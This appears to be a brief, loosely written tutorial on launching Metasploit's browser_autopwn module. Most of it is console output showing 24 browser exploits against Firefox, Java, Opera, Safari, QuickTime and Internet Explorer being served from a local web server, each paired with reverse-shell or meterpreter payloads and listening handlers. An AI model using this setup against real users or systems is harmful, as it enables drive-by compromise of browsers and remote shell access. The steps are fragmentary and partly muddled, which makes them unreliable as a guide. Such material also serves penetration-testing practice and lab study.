we will try auxillary modul form metasploit,modul we will use is auxiliary/server/browser_autopwn:
so,will display as below:
This
module has three actions. The first (and the default) is 'WebServer'
which uses a combination of client-side and server-side techniques to
fingerprint HTTP clients and then automatically exploit them. Next is
'DefangedDetection' which does only the fingerprinting part. Lastly,
'list' simply prints the names of all exploit modules that would be used
by the WebServer action given the current MATCH and EXCLUDE options.
Also adds a 'list' command which is the same as running with
ACTION=list.
for using,Open metasploit:
use auxillary module and set RHOST:
run this module:
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2012-02-28 00:04:40 +0700
msf auxiliary(browser_autopwn) > [*] Done in 1.451408451 seconds
[*] Starting exploit modules on host 192.168.56.101...
[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/GPPGxTPw
[*] Local IP: http://192.168.0.118:8080/GPPGxTPw
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/erjw
[*] Local IP: http://192.168.0.118:8080/erjw
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YvHFyVW
[*] Local IP: http://192.168.0.118:8080/YvHFyVW
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/RUloNeXoiybxz
[*] Local IP: http://192.168.0.118:8080/RUloNeXoiybxz
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/RpjdlmgPxU
[*] Local IP: http://192.168.0.118:8080/RpjdlmgPxU
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/iywyoqLYq
[*] Local IP: http://192.168.0.118:8080/iywyoqLYq
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/bAlgIpw
[*] Local IP: http://192.168.0.118:8080/bAlgIpw
[*] Server started.
[*] Starting exploit osx/browser/mozilla_mchannel with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/nxcZV
[*] Local IP: http://192.168.0.118:8080/nxcZV
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cNhwDArnPB
[*] Local IP: http://192.168.0.118:8080/cNhwDArnPB
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/OKoFv
[*] Local IP: http://192.168.0.118:8080/OKoFv
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/IsexU
[*] Local IP: http://192.168.0.118:8080/IsexU
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/XFhzmaO
[*] Local IP: http://192.168.0.118:8080/XFhzmaO
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/BwDF
[*] Local IP: http://192.168.0.118:8080/BwDF
[*] Server started.
[*] Using URL: http://0.0.0.0:8080/CMOiVXl
[*] Local IP: http://192.168.0.118:8080/CMOiVXl
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/NLhEHUIjYX
[*] Local IP: http://192.168.0.118:8080/NLhEHUIjYX
[*] Server started.
[*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cJfs
[*] Local IP: http://192.168.0.118:8080/cJfs
[*] Server started.
[*] Starting exploit windows/browser/mozilla_mchannel with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/NUcpfrezHXo
[*] Local IP: http://192.168.0.118:8080/NUcpfrezHXo
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/vEOWsQVW
[*] Local IP: http://192.168.0.118:8080/vEOWsQVW
[*] Server started.
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/ZplGY
[*] Local IP: http://192.168.0.118:8080/ZplGY
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/ElFimUoER
[*] Local IP: http://192.168.0.118:8080/ElFimUoER
[*] Server started.
[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/dkBVEOtNi
[*] Local IP: http://192.168.0.118:8080/dkBVEOtNi
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/FZodZgavbZKl
[*] Local IP: http://192.168.0.118:8080/FZodZgavbZKl
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/oAuIqBnpTIxEM
[*] Local IP: http://192.168.0.118:8080/oAuIqBnpTIxEM
[*] Server started.
[*] Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/rJht
[*] Local IP: http://192.168.0.118:8080/rJht
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[-] Handler failed to bind to 192.168.56.101:3333
[-] Handler failed to bind to 0.0.0.0:3333
[-] Exploit exception: The address is already in use (0.0.0.0:3333).
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[-] Handler failed to bind to 192.168.56.101:6666
[-] Handler failed to bind to 0.0.0.0:6666
[-] Exploit exception: The address is already in use (0.0.0.0:6666).
[-] Handler failed to bind to 192.168.56.101:7777
[-] Handler failed to bind to 0.0.0.0:7777
[-] Exploit exception: The address is already in use (0.0.0.0:7777).
[*] --- Done, found 24 exploit modules
[*] Using URL: http://0.0.0.0:8080/fKS8Ax
[*] Local IP: http://192.168.0.118:8080/fKS8Ax
[*] Server started.